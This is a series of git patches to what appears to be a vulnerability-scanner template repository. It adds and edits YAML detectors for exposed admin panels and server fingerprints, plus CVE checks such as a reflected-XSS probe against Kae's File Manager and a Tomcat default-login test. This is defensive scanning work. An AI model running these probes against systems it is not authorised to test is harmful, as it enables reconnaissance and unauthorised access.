b/exposed-panels/kfm/kaes-file-manager.yaml similarity index 91% rename from exposed-panels/kaes-file-manager.yaml rename to exposed-panels/kfm/kaes-file-manager.yaml index c51490eeb3..5d4b087a7f 100644 --- a/exposed-panels/kaes-file-manager.yaml +++ b/exposed-panels/kfm/kaes-file-manager.yaml @@ -4,7 +4,7 @@ info: name: Kae's File Manager author: princechaddha severity: unknown - tags: panel,kaes,filemanager + tags: panel,kaes,filemanager,kfm requests: - method: GET From ed0b835177c32b135a2eb9f9df72f039a97a9765 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 11 Nov 2022 15:42:39 +0530 Subject: [PATCH 0157/1415] Update CVE-2022-40359.yaml --- cves/2022/CVE-2022-40359.yaml | 25 +++++++++++++------------ 1 file changed, 13 insertions(+), 12 deletions(-) diff --git a/cves/2022/CVE-2022-40359.yaml b/cves/2022/CVE-2022-40359.yaml index d567a66ccf..6d89ca095d 100644 --- a/cves/2022/CVE-2022-40359.yaml +++ b/cves/2022/CVE-2022-40359.yaml @@ -11,30 +11,31 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-40359 classification: cve-id: CVE-2022-40359 - tags: xss,kfm,cve,cve2022 + metadata: + verified: true + tags: cve,cve2022,xss,kfm requests: - raw: - | - @timeout: 10s GET /kfm/index.php/' HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - "text/html" - - type: word part: body words: - "" - "x_kfm_changeCaption" - "kfm_copyFiles" - condition: and \ No newline at end of file + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From b6ac0c14d8f158d1b0752f14cc2fe0af386d4909 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 10:13:48 +0000 Subject: [PATCH 0158/1415] Auto Generated New Template Addition List [Fri Nov 11 10:13:48 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e93ec5c0fa..b7354a47f7 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ exposed-panels/deluge-webui-panel.yaml exposed-panels/mailhog-panel.yaml exposed-panels/payroll-management-system-panel.yaml exposed-panels/wiren-board-webui.yaml +exposures/logs/git-exposure.yaml iot/zebra-printer-detect.yaml misconfiguration/ace-admin-dashboard.yaml misconfiguration/codis-dashboard.yaml From 721c475eed58a381d60d128ee76124df90ade10c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 13:47:41 +0000 Subject: [PATCH 0159/1415] Auto Generated New Template Addition List [Fri Nov 11 13:47:41 UTC 2022] :robot: --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index b7354a47f7..100e56abaf 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2022/CVE-2022-0788.yaml cves/2022/CVE-2022-0824.yaml cves/2022/CVE-2022-0867.yaml cves/2022/CVE-2022-2373.yaml +cves/2022/CVE-2022-40359.yaml cves/2022/CVE-2022-42746.yaml cves/2022/CVE-2022-42747.yaml cves/2022/CVE-2022-42748.yaml @@ -11,6 +12,8 @@ default-logins/datahub/datahub-metadata-default-login.yaml default-logins/samsung/samsung-printer-default-login.yaml exposed-panels/airnotifier-panel.yaml exposed-panels/deluge-webui-panel.yaml +exposed-panels/kfm/kaes-file-manager.yaml +exposed-panels/kfm/kfm-login-panel.yaml exposed-panels/mailhog-panel.yaml exposed-panels/payroll-management-system-panel.yaml exposed-panels/wiren-board-webui.yaml From 33b2ea1b4d0959f87380fcc91938f4677daaabcd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 13:51:47 +0000 Subject: [PATCH 0160/1415] Auto Generated New Template Addition List [Fri Nov 11 13:51:47 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 100e56abaf..749b4e55cd 100644 --- a/.new-additions +++ b/.new-additions @@ -3,6 +3,7 @@ cves/2022/CVE-2022-0788.yaml cves/2022/CVE-2022-0824.yaml cves/2022/CVE-2022-0867.yaml cves/2022/CVE-2022-2373.yaml +cves/2022/CVE-2022-26263.yaml cves/2022/CVE-2022-40359.yaml cves/2022/CVE-2022-42746.yaml cves/2022/CVE-2022-42747.yaml From 88b4d06106ab06a78d589f3b7f3b60eab4c33c9e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 14:05:07 +0000 Subject: [PATCH 0161/1415] Auto Generated CVE annotations [Fri Nov 11 14:05:07 UTC 2022] :robot: --- cves/2019/CVE-2019-2729.yaml | 2 +- cves/2022/CVE-2022-40359.yaml | 6 +++++- 2 files changed, 6 insertions(+), 2 deletions(-) diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index a74411e08d..9d1eca4f52 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 diff --git a/cves/2022/CVE-2022-40359.yaml b/cves/2022/CVE-2022-40359.yaml index 6d89ca095d..1aa259a1f4 100644 --- a/cves/2022/CVE-2022-40359.yaml +++ b/cves/2022/CVE-2022-40359.yaml @@ -9,10 +9,14 @@ info: reference: - https://cxsecurity.com/issue/WLB-2022090057 - https://nvd.nist.gov/vuln/detail/CVE-2022-40359 + - https://code.google.com/archive/p/kfm/downloads classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-40359 + cwe-id: CWE-79 metadata: - verified: true + verified: "true" tags: cve,cve2022,xss,kfm requests: From 4f11497e8ffddfd6d4c581105e75c088a66001d0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Fri, 11 Nov 2022 19:45:03 +0530 Subject: [PATCH 0163/1415] Update lancom-router-panel.yaml --- exposed-panels/lancom-router-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/lancom-router-panel.yaml b/exposed-panels/lancom-router-panel.yaml index 549f4aa084..28365a2baf 100644 --- a/exposed-panels/lancom-router-panel.yaml +++ b/exposed-panels/lancom-router-panel.yaml @@ -21,7 +21,7 @@ requests: words: - 'alt="LANCOM Systems GmbH"' - 'class="outside_device_string_common">LANCOM' - condition: and + condition: or - type: status status: From ce9613d34a3dd99d5c0f493d17c91aa93f03e306 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Fri, 11 Nov 2022 18:33:53 +0800 Subject: [PATCH 0165/1415] Add: Mongoose Server fingerprint --- technologies/mongoose-server.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 technologies/mongoose-server.yaml diff --git a/technologies/mongoose-server.yaml b/technologies/mongoose-server.yaml new file mode 100644 index 0000000000..ddf3820431 --- /dev/null +++ b/technologies/mongoose-server.yaml @@ -0,0 +1,29 @@ +id: mongoose-server + +info: + name: Mongoose Server + author: lu4nx + severity: info + description: | + Mongoose is a embedded web server + reference: + - https://github.com/cesanta/mongoose + metadata: + shodan-query: 'Mongoose' + tags: mongoose + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: header + words: + - "Server: Mongoose/" + + - type: status + status: + - 200 From 2a89dca954ec742c399992dce31628e84cb76998 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 14:43:40 +0000 Subject: [PATCH 0166/1415] Auto Generated New Template Addition List [Fri Nov 11 14:43:40 UTC 2022] :robot: --- .new-additions | 3 +++ 1 file changed, 3 insertions(+) diff --git a/.new-additions b/.new-additions index 749b4e55cd..6d94d44c9e 100644 --- a/.new-additions +++ b/.new-additions @@ -1,7 +1,10 @@ +cves/2022/CVE-2022-0735.yaml cves/2022/CVE-2022-0785.yaml cves/2022/CVE-2022-0788.yaml cves/2022/CVE-2022-0824.yaml cves/2022/CVE-2022-0867.yaml +cves/2022/CVE-2022-1162.yaml +cves/2022/CVE-2022-2185.yaml cves/2022/CVE-2022-2373.yaml cves/2022/CVE-2022-26263.yaml cves/2022/CVE-2022-40359.yaml From 25082b9d0e329d59d2ffaa323993d413d8d1e8e7 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Fri, 11 Nov 2022 22:58:06 +0800 Subject: [PATCH 0168/1415] Add: JumpServer Panel --- exposed-panels/jumpserver-panel.yaml | 31 ++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/jumpserver-panel.yaml diff --git a/exposed-panels/jumpserver-panel.yaml b/exposed-panels/jumpserver-panel.yaml new file mode 100644 index 0000000000..2140bd47db --- /dev/null +++ b/exposed-panels/jumpserver-panel.yaml @@ -0,0 +1,31 @@ +id: jumpserver-panel + +info: + name: JumpServer admin panel + author: lu4nx + severity: info + description: | + The JumpServer Open Source Bastion Host was found. + reference: + - https://www.jumpserver.org/ + metadata: + zoomeye-query: title:'JumpServer' + tags: panel,jumpserver + +requests: + - method: GET + path: + - "{{BaseURL}}/core/auth/login/" + + matchers-condition: and + matchers: + - type: regex + part: body + condition: or + regex: + - "(?i)(\n.*)JumpServer Open Source Bastion Host(\n.*)" + - "(?i)(\n.*)JumpServer 开源堡垒机(\n.*)" + + - type: status + status: + - 200 From 447b8f28ba89f948ac3145284f0ea100bc02f892 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 14:58:53 +0000 Subject: [PATCH 0169/1415] Auto Generated CVE annotations [Fri Nov 11 14:58:53 UTC 2022] :robot: --- cves/2022/CVE-2022-2185.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2022/CVE-2022-2185.yaml b/cves/2022/CVE-2022-2185.yaml index f434b1f0d0..6bf7e4702f 100644 --- a/cves/2022/CVE-2022-2185.yaml +++ b/cves/2022/CVE-2022-2185.yaml @@ -3,15 +3,15 @@ id: CVE-2022-2185 info: name: GitLab CE/EE - Import RCE author: GitLab Red Team - severity: critical + severity: high description: A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution. reference: - https://gitlab.com/gitlab-com/gl-security/threatmanagement/redteam/redteam-public/cve-hash-harvester - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2185 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 cve-id: CVE-2022-2185 cwe-id: CWE-732 metadata: From b41ef52bbd2a02202123355671c2fee9049b5b94 Mon Sep 17 00:00:00 2001 From: lu4nx Date: Fri, 11 Nov 2022 23:48:42 +0800 Subject: [PATCH 0170/1415] Fixed: Fingerprint matching error of JumpServer --- technologies/fingerprinthub-web-fingerprints.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) mode change 100644 => 100755 technologies/fingerprinthub-web-fingerprints.yaml diff --git a/technologies/fingerprinthub-web-fingerprints.yaml b/technologies/fingerprinthub-web-fingerprints.yaml old mode 100644 new mode 100755 index 5f360a88a2..5b4733e11d --- a/technologies/fingerprinthub-web-fingerprints.yaml +++ b/technologies/fingerprinthub-web-fingerprints.yaml @@ -6314,9 +6314,11 @@ requests: - "background-color: #4a93be;" - type: word + condition: or name: jumpserver words: - - Jumpserver开源堡垒机 + - JumpServer 开源堡垒机 + - JumpServer Open Source Bastion Host - type: word condition: and From e3e50e0937dd3a41e1a0febb97594b28e775c3b7 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Fri, 11 Nov 2022 07:53:47 -0800 Subject: [PATCH 0171/1415] Create parse-dashboard.yaml --- exposed-panels/parse-dashboard.yaml | 33 +++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 exposed-panels/parse-dashboard.yaml diff --git a/exposed-panels/parse-dashboard.yaml b/exposed-panels/parse-dashboard.yaml new file mode 100644 index 0000000000..3e411dbf08 --- /dev/null +++ b/exposed-panels/parse-dashboard.yaml @@ -0,0 +1,33 @@ +id: parse-dashboard + +info: + name: Parse Dashboard Exposure + author: tess + severity: info + metadata: + verified: true + shodan-query: title:"Parse Dashboard" + tags: detect,parse + +requests: + - method: GET + path: + - '{{BaseURL}}/login' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Parse Dashboard" + - "PARSE_DASHBOARD_PATH" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From df77553744f94a454e0907b81bc41dcebda3bb2b Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Fri, 11 Nov 2022 08:08:09 -0800 Subject: [PATCH 0172/1415] Create dplus-dashboard.yaml --- exposed-panels/dplus-dashboard.yaml | 34 +++++++++++++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 exposed-panels/dplus-dashboard.yaml diff --git a/exposed-panels/dplus-dashboard.yaml b/exposed-panels/dplus-dashboard.yaml new file mode 100644 index 0000000000..eb41cb97d0 --- /dev/null +++ b/exposed-panels/dplus-dashboard.yaml @@ -0,0 +1,34 @@ +id: dplus-dashboard + +info: + name: DPLUS Dashboard Exposure + author: tess + severity: info + metadata: + verified: true + shodan-query: title:"DPLUS Dashboard" + tags: detect,dplus + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "DPLUS Dashboard" + - "Module A" + - "Module B" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 715c540b736339610b68cb91f015aea0dd777008 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 21:55:05 +0530 Subject: [PATCH 0173/1415] Update parse-dashboard.yaml --- exposed-panels/parse-dashboard.yaml | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) diff --git a/exposed-panels/parse-dashboard.yaml b/exposed-panels/parse-dashboard.yaml index 3e411dbf08..a73c49e2cd 100644 --- a/exposed-panels/parse-dashboard.yaml +++ b/exposed-panels/parse-dashboard.yaml @@ -7,12 +7,12 @@ info: metadata: verified: true shodan-query: title:"Parse Dashboard" - tags: detect,parse + tags: panel,parse,exposure requests: - method: GET path: - - '{{BaseURL}}/login' + - "{{BaseURL}}/login" matchers-condition: and matchers: @@ -23,11 +23,6 @@ requests: - "PARSE_DASHBOARD_PATH" condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 666b011a94fd39f8ce1180d071c53754cddf0913 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 21:56:24 +0530 Subject: [PATCH 0174/1415] Update dplus-dashboard.yaml --- exposed-panels/dplus-dashboard.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/exposed-panels/dplus-dashboard.yaml b/exposed-panels/dplus-dashboard.yaml index eb41cb97d0..646cc7cd88 100644 --- a/exposed-panels/dplus-dashboard.yaml +++ b/exposed-panels/dplus-dashboard.yaml @@ -7,7 +7,7 @@ info: metadata: verified: true shodan-query: title:"DPLUS Dashboard" - tags: detect,dplus + tags: panel,dplus,exposure requests: - method: GET @@ -24,11 +24,6 @@ requests: - "Module B" condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 3f47ca5d811d89d15308a15fc0ccec022b5721b9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 16:27:10 +0000 Subject: [PATCH 0175/1415] Auto Generated New Template Addition List [Fri Nov 11 16:27:10 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 6d94d44c9e..567fe66ef9 100644 --- a/.new-additions +++ b/.new-additions @@ -19,6 +19,7 @@ exposed-panels/deluge-webui-panel.yaml exposed-panels/kfm/kaes-file-manager.yaml exposed-panels/kfm/kfm-login-panel.yaml exposed-panels/mailhog-panel.yaml +exposed-panels/parse-dashboard.yaml exposed-panels/payroll-management-system-panel.yaml exposed-panels/wiren-board-webui.yaml exposures/logs/git-exposure.yaml From 20c9c39b81ff1798fca954883fe44446ad8e5cb6 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 16:28:10 +0000 Subject: [PATCH 0176/1415] Auto Generated New Template Addition List [Fri Nov 11 16:28:10 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 567fe66ef9..f092ed1a68 100644 --- a/.new-additions +++ b/.new-additions @@ -16,6 +16,7 @@ default-logins/datahub/datahub-metadata-default-login.yaml default-logins/samsung/samsung-printer-default-login.yaml exposed-panels/airnotifier-panel.yaml exposed-panels/deluge-webui-panel.yaml +exposed-panels/dplus-dashboard.yaml exposed-panels/kfm/kaes-file-manager.yaml exposed-panels/kfm/kfm-login-panel.yaml exposed-panels/mailhog-panel.yaml From 961ee225f5bc60b3ebf88f26c33f287c2cc6859a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 16:43:11 +0000 Subject: [PATCH 0177/1415] Auto Generated CVE annotations [Fri Nov 11 16:43:11 UTC 2022] :robot: --- cves/2019/CVE-2019-16759.yaml | 2 +- cves/2019/CVE-2019-2729.yaml | 2 +- vulnerabilities/thinkphp/thinkphp-501-rce.yaml | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/cves/2019/CVE-2019-16759.yaml b/cves/2019/CVE-2019-16759.yaml index 35190e4a97..cb5e7c0762 100644 --- a/cves/2019/CVE-2019-16759.yaml +++ b/cves/2019/CVE-2019-16759.yaml @@ -16,8 +16,8 @@ info: cve-id: CVE-2019-16759 cwe-id: CWE-94 metadata: - verified: true shodan-query: http.component:"vBulletin" + verified: "true" tags: cve,cve2019,rce,kev,seclists,vbulletin requests: diff --git a/cves/2019/CVE-2019-2729.yaml b/cves/2019/CVE-2019-2729.yaml index 9d1eca4f52..a74411e08d 100644 --- a/cves/2019/CVE-2019-2729.yaml +++ b/cves/2019/CVE-2019-2729.yaml @@ -12,7 +12,7 @@ info: - http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2729-5570780.html - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-2729 cwe-id: CWE-284 diff --git a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml index d7a78781c8..2309ac4cb3 100644 --- a/vulnerabilities/thinkphp/thinkphp-501-rce.yaml +++ b/vulnerabilities/thinkphp/thinkphp-501-rce.yaml @@ -11,7 +11,7 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10.0 cwe-id: CWE-77 - tags: thinkphp,rce + tags: edb,thinkphp,rce requests: - method: POST From f2f83f2746de1e44e2e5772de44973a01b49cd4b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 22:15:43 +0530 Subject: [PATCH 0178/1415] Update public-tomcat-manager.yaml --- exposed-panels/apache/public-tomcat-manager.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposed-panels/apache/public-tomcat-manager.yaml b/exposed-panels/apache/public-tomcat-manager.yaml index ee96281c8b..0ef97a598a 100644 --- a/exposed-panels/apache/public-tomcat-manager.yaml +++ b/exposed-panels/apache/public-tomcat-manager.yaml @@ -2,7 +2,7 @@ id: public-tomcat-manager info: name: Apache Tomcat Manager Disclosure - author: Ahmed Sherif,geeknik + author: Ahmed Sherif,geeknik,sinKettu severity: info description: An Apache Tomcat Manager panel was discovered. classification: @@ -22,11 +22,11 @@ requests: - type: word words: - "Apache Tomcat" + - "Tomcat Manager" + condition: or - type: status status: - 401 - 200 condition: or - -# Enhanced by mp on 2022/03/16 From ce48d51b406ddb4fd67accc60ebaf75298565329 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 11 Nov 2022 22:16:16 +0530 Subject: [PATCH 0179/1415] Update tomcat-default-login.yaml --- default-logins/apache/tomcat-default-login.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml index 6479253691..96a98e2ffa 100644 --- a/default-logins/apache/tomcat-default-login.yaml +++ b/default-logins/apache/tomcat-default-login.yaml @@ -2,7 +2,7 @@ id: tomcat-default-login info: name: Apache Tomcat Manager Default Login - author: pdteam,sinKettu + author: pdteam severity: high description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations. reference: @@ -68,6 +68,7 @@ requests: words: - "Apache Tomcat" - "Server Information" + - "Hostname" condition: and - type: status From 8265d529588f81ef496dc25685d5da448234ed7c Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Fri, 11 Nov 2022 11:11:39 -0800 Subject: [PATCH 0181/1415] Create elastic-hd-dashboard.yaml --- misconfiguration/elastic-hd-dashboard.yaml | 33 ++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 misconfiguration/elastic-hd-dashboard.yaml diff --git a/misconfiguration/elastic-hd-dashboard.yaml b/misconfiguration/elastic-hd-dashboard.yaml new file mode 100644 index 0000000000..77d01c4203 --- /dev/null +++ b/misconfiguration/elastic-hd-dashboard.yaml @@ -0,0 +1,33 @@ +id: elastic-hd-dashboard + +info: + name: Elastic HD Dashboard + author: tess + severity: medium + metadata: + verified: true + shodan-query: title:"Elastic HD Dashboard" + tags: misconfig,exposure,elastic + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Elastic HD Dashboard" + - "elasticsearch go Edition head plugin" + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 04932f24271da570726f81fce407a4e974c25cae Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 01:01:35 +0530 Subject: [PATCH 0182/1415] Update CVE-2022-0735.yaml --- cves/2022/CVE-2022-0735.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-0735.yaml b/cves/2022/CVE-2022-0735.yaml index a8589b8781..d924ae0074 100644 --- a/cves/2022/CVE-2022-0735.yaml +++ b/cves/2022/CVE-2022-0735.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-863 metadata: shodan-query: http.title:"GitLab" - tags: kev,hackerone,cve,cve2022,gitlab,registration token disclosure + tags: cve,cve2022,gitlab requests: - method: GET From 9ad18eca3d65b2cea7ee8883a13584d3de9e39d0 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 01:02:15 +0530 Subject: [PATCH 0184/1415] Update CVE-2022-1162.yaml --- cves/2022/CVE-2022-1162.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-1162.yaml b/cves/2022/CVE-2022-1162.yaml index 73f64e55a0..c7c95021e2 100644 --- a/cves/2022/CVE-2022-1162.yaml +++ b/cves/2022/CVE-2022-1162.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-798 metadata: shodan-query: http.title:"GitLab" - tags: kev,hackerone,cve,cve2022,gitlab,default password + tags: cve,cve2022,gitlab requests: - method: GET From f519ad9c6cd4d6be19d135d93706c89e221148bf Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 01:02:49 +0530 Subject: [PATCH 0186/1415] Update CVE-2022-2185.yaml --- cves/2022/CVE-2022-2185.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-2185.yaml b/cves/2022/CVE-2022-2185.yaml index 6bf7e4702f..9b04432fd6 100644 --- a/cves/2022/CVE-2022-2185.yaml +++ b/cves/2022/CVE-2022-2185.yaml @@ -16,7 +16,7 @@ info: cwe-id: CWE-732 metadata: shodan-query: http.title:"GitLab" - tags: kev,hackerone,cve,cve2022,gitlab,import rce + tags: cve,cve2022,gitlab requests: - method: GET From 63d764fc41a65660a77a9f2f205254a4016da8f9 Mon Sep 17 00:00:00 2001 From: Arman <65326024+tess-ss@users.noreply.github.com> Date: Fri, 11 Nov 2022 11:32:54 -0800 Subject: [PATCH 0187/1415] Update elastic-hd-dashboard.yaml --- misconfiguration/elastic-hd-dashboard.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/misconfiguration/elastic-hd-dashboard.yaml b/misconfiguration/elastic-hd-dashboard.yaml index 77d01c4203..3a742acd7a 100644 --- a/misconfiguration/elastic-hd-dashboard.yaml +++ b/misconfiguration/elastic-hd-dashboard.yaml @@ -3,7 +3,7 @@ id: elastic-hd-dashboard info: name: Elastic HD Dashboard author: tess - severity: medium + severity: low metadata: verified: true shodan-query: title:"Elastic HD Dashboard" From 18c7643063d8460b373d432f8a6ea9597b4a3a5c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 01:04:18 +0530 Subject: [PATCH 0189/1415] Update elastic-hd-dashboard.yaml --- misconfiguration/elastic-hd-dashboard.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/elastic-hd-dashboard.yaml b/misconfiguration/elastic-hd-dashboard.yaml index 3a742acd7a..842ddf1e85 100644 --- a/misconfiguration/elastic-hd-dashboard.yaml +++ b/misconfiguration/elastic-hd-dashboard.yaml @@ -1,7 +1,7 @@ id: elastic-hd-dashboard info: - name: Elastic HD Dashboard + name: Elastic HD Dashboard Exposure author: tess severity: low metadata: @@ -12,7 +12,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}' + - "{{BaseURL}}" matchers-condition: and matchers: From 557432aec3594d0b99eee5f7a3e206d29e6d1219 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 11 Nov 2022 19:36:20 +0000 Subject: [PATCH 0190/1415] Auto Generated New Template Addition List [Fri Nov 11 19:36:20 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f092ed1a68..3c5b423d40 100644 --- a/.new-additions +++ b/.new-additions @@ -28,6 +28,7 @@ iot/zebra-printer-detect.yaml misconfiguration/ace-admin-dashboard.yaml misconfiguration/codis-dashboard.yaml misconfiguration/confluence-dashboard.yaml +misconfiguration/elastic-hd-dashboard.yaml misconfiguration/encompass-cm1-homepage.yaml misconfiguration/hydra-dashboard.yaml misconfiguration/installer/openmage-install.yaml From d55be6e274b83d9c37db539e4b94a98b092042ab Mon Sep 17 00:00:00 2001 From: Adam Crosser Date: Fri, 11 Nov 2022 13:39:27 -0600 Subject: [PATCH 0191/1415] Ansible AWX Detection Template --- technologies/ansible-awx-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/ansible-awx-detect.yaml diff --git a/technologies/ansible-awx-detect.yaml b/technologies/ansible-awx-detect.yaml new file mode 100644 index 0000000000..93c33fb8d3 --- /dev/null +++ b/technologies/ansible-awx-detect.yaml @@ -0,0 +1,25 @@ +id: ansible-awx-detect + +info: + name: Ansible AWX Detection + author: Adam Crosser + severity: info + reference: + - https://github.com/ansible/awx + description: Detects Ansible AWX Instance + tags: tech,ansible,awx + +requests: + - method: GET + path: + - "{{BaseURL}}/api/" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"description":"AWX REST API"' + - type: status + status: + - 200 From 8d8667167975e59584918ab939c411d9703701d4 Mon Sep 17 00:00:00 2001 From: Adam Crosser Date: Fri, 11 Nov 2022 13:43:46 -0600 Subject: [PATCH 0192/1415] Updated Ansible AWX Detection Template --- technologies/ansible-awx-detect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/technologies/ansible-awx-detect.yaml b/technologies/ansible-awx-detect.yaml index 93c33fb8d3..d1ed24ff44 100644 --- a/technologies/ansible-awx-detect.yaml +++ b/technologies/ansible-awx-detect.yaml @@ -22,4 +22,4 @@ requests: - '"description":"AWX REST API"' - type: status status: - - 200 + - 200 From a55fd585afc45b0acd542bcfb532c19179a13607 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Sat, 12 Nov 2022 01:13:54 +0530 Subject: [PATCH 0193/1415] Update mongoose-server.yaml --- technologies/mongoose-server.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/technologies/mongoose-server.yaml b/technologies/mongoose-server.yaml index ddf3820431..5bd5de3095 100644 --- a/technologies/mongoose-server.yaml +++ b/technologies/mongoose-server.yaml @@ -9,8 +9,8 @@ info: 